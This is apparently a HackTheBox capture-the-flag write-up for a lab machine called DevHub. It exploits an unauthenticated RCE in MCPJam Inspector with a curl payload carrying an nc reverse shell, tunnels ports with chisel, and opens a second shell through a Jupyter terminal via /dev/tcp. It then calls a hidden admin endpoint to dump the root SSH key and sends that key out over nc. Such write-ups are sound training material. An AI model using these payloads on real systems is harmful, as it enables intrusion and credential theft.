DevHub
Machine Info
| Field | Details |
|---|---|
| Machine Name | DevHub |
| OS | Linux |
| Difficulty | Medium |
| Status | Pwned |
Tools Used
Summary
DevHub is a developer-focused machine centred around real-world MCP tooling vulnerabilities, where initial access is gained via an unauthenticated RCE in MCPJam Inspector (CVE-2026-23744) on port 6274, followed by lateral movement through a Jupyter server with a hardcoded token.
Privilege escalation to root is achieved by abusing a writable internal Flask API (opsmcp) running as root, which exposes a hidden credential dump endpoint that leaks the root SSH private key.
Reconnaissance
Initial Scan (NMAP)
Initial scan reveals website running on port 80.
# Nmap 7.98 scan initiated Sat May 30 15:54:58 2026 as: /usr/lib/nmap/nmap --privileged -sC -sV -oN recon/scan.txt 10.129.46.149
Nmap scan report for 10.129.46.149
Host is up (0.23s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:78:2e:79:0d:87:13:05:2f:53:8e:e7:3c:55:b6:4c (ECDSA)
|_ 256 dd:56:8e:bc:da:b8:38:3e:9a:cd:0b:74:ee:53:85:f8 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devhub.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 30 15:55:29 2026 -- 1 IP address (1 host up) scanned in 31.34 seconds
Further enumeration on site reveals MCPJAM Inspector service running on port 6274 & an internal site running on port 8888.
Open Ports:
| Port | Service | Version | Notes |
|---|---|---|---|
| 22 | ssh | 8.9p1 | |
| 80 | http site running on nginx | 1.18.0 | |
| 6274 | MCPJAm Inspector | 1.4.2 | |
| 8888 | Jupyter | N/A | Discovered later while post exploitation. |
| 5555 | Discovered later while performing PE. |
Vulnerability Identification
MCPJam inspector is the local-first development platform for MCP servers. The Latest version Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE.
CVEs / Vulnerabilities Identified
| CVE | Description | Severity |
|---|---|---|
| CVE-2026-23744 | Unauthenticated RCE in MCPJam Inspector (CVSS 9.8)<br>Versions 1.4.2 and earlier of MCPJam Inspector are vulnerable to RCE. An attacker can send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. This vulnerability is more severe than CVE-2025-49596 — while that one requires tricking a user into clicking a malicious link, this one is exploitable with no user interaction. | Critical |
Initial Foothold / Initial Access
CVE-2026-23744
Description: To exploit the vulnerability, this proof of concept was used as a reference. We used the same command in linux format to trigger a reverse shell
Sending the following command while keeping the netcat listening for 4444 gives us initial foothold
curl -X POST http://devhub.htb:6274/api/mcp/connect \
-H "Content-Type: application/json" \
-d '{"serverConfig":{"command":"/bin/sh","args":["-c","rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.23 4444 >/tmp/f"],"env":{}},"serverId":"pwned"}'
Post-Exploitation
System Enumeration
At starting of the recon phase we discovered that the port 8888 are running locally on http://localhost:8888. To reverse the ports back to our client machine, we use chisel.
#On client machine
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz gunzip chisel_linux_amd64.gz
chmod +x chisel_linux_amd64
./chisel_linux_amd64 server -p 9000 --reverse
#On DevHub foothold
curl http://10.10.14.23:9000/chisel_linux_amd64 -o /tmp/chisel
chmod +x /tmp/chisel
# Forward port 8888 back to you
/tmp/chisel client 10.10.14.23:9000 R:8888:127.0.0.1:8888
Visiting the http://localhost:8888 from our local machine reverses us to the forwarded ports of the machine which is running a Jupyter server which requires a secret token for user authentication.
Credential Discovery
Further enumeration on initial foothold provides a token for the user analyst which gives us access to Jupyter.
find /etc/systemd -name "*.service" 2>/dev/null | xargs grep -l token grep:
...
"/etc/systemd/system/multi-user.target.wants/jupyter.service"
a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7
cat /etc/systemd/system/jupyter.service
---SNIP---
'a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7'
---SNIP---
Lateral Movement (Pivoting to user 'analyst')
Running the url authenticates us on the jupyter.
http://127.0.0.1:8888/?token=a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7
Creating a new terminal on Jupyter server and running a reverse shell command gives us a reverse shell for the user 'analyst'.
#In Jupyter Terminal
bash -i >& /dev/tcp/10.10.14.23/5555 0>&1
#In local machine
nc -lvnp 5555
User Flag
---CENSORED---
Privilege Escalation
Enumeration
Uploading linpeas and running scan reveals that we have root access to /opt/opsmcp/servers.py which is running an internal server on port 5000
Further investigation and after reading the servers.py code we discover that, there's a hidden ops._admin_dump endpoint that runs as root and can dump the root SSH keys. We can call it directly.
curl -s -X POST http://127.0.0.1:5000/tools/call \
-H "Content-Type: application/json" \
-H "X-API-Key: opsmcp_secret_key_4f5a6b7c8d9e0f1a" \ #Secret key found inside the scripts.py code.
-d '{"name": "ops._admin_dump", "arguments": {"target": "ssh_keys", "confirm": true}}' \
| python3 -c "import sys,json; print(json.load(sys.stdin)['root_private_key'])" > /tmp/root_key
Transferring the fetched SSH key back to our machine, we can login as root.
# On your kali first:
nc -lvnp 7777 > root_id_rsa
# On target:
nc 10.10.14.23 7777 < /tmp/root_key
chmod 600 root_id_rsa
ssh -i root_id_rsa root@devhub.htb
Root Flag
---CENSORED---
Trophy
https://labs.hackthebox.com/achievement/machine/1574945/903
Completed as part of HackTheBox practice in a legal, controlled environment.